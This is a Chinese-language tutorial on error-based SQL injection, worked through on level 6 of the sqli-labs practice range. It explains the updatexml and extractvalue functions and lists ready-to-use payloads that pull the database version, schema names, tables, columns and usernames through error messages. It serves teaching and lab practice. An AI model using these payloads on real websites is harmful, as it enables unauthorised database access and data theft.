SQL报错注入

一、SQL注入的类型

1、基于union的联合注入

2、报错注入

3、盲注注入

    （1）布尔盲注

    （2）基于时间的盲注                               

我们上一章写了基于union的联合注入，这次我们来看一下同样很简单的报错注入。

二、什么是报错注入

报错注入：通过一些函数错误的使用使其输出错误结果来获取信息。用于注入结果无回显但错误信息有输出的情况。返回的错误信息即是攻击者需要的信息。 

三、报错注入常用函数

1、updatexml(1,2,3)

1. xml文件名
2. Xpath路径
3. 更新内容

我们接下使用的函数就是updataxml()，利用第二个变量Xpath路径结合Concat()连接函数进行报错。 

2、Extractvalue(1,2)

     1. xml文档对象的名称

     2.从xml文档对象中返回查询到的字符串值

 3、floor（）

这个比较复杂，有兴趣的小伙伴们可以学习然后教我哦

 四、开始报错注入吧

1、判断输入是否有闭合符

2、判断闭合符

3、判断字段个数

4、判断当前库名和SQL版本

5、查询所有数据库库名 

6、查询指定库的所有表 

7、查询字段名

8、查询字段内容

1-3步和上一章所讲的基于union的联合注入一样所以不多赘述，我们接下来从第4步开始

1、判断输入是否有闭合符

2、判断闭合符

本章使用的例子是sqli-labs-php7-master靶场的第六关，这一关的闭合符是 "

3、判断字段个数

4、判断当前库名和SQL版本

和联合注入不一样的是，报错注入没有傻到直接输出信息，而是需要构造报错函数利用报错回显使信息输出 所以想要获得当前版本和库名就要构造报错函数。

payload：

id=1" and updatexml(1,concat("~",version()),3) --+   -- 查询的SQL版本
id=1" and updatexml(1,concat("~",database()),3) --+  -- 查询的当前库名

5、查询所有数据库库名 

payload：

id=1" and updatexml(1,concat("~",(select group_concat(schema_name)
from information_schema.schemata limit n,1)),3) --+

limit（n,1） 这里的n是指第n-1行从limit（0,1）开始，一行一行查找。

  

6、查询指定库的所有表  

payload：

id=1" and updatexml(1,concat("~",substr((select group_concat(table_name)
from information_schema.tables where table_schema='security'),1,30)),3)-- -

 

7、查询字段名

payload：

id=1" and updatexml(1,concat("~",substr((select group_concat(column_name)from 
information_schema.columns where table_schema='security' and table_name='users'),1,30)),3)-- -

  

8、查询字段内容

payload：

id=1" and updatexml(1,concat("~",substr((select group_concat(username)
from security.users),1,30)),3) -- -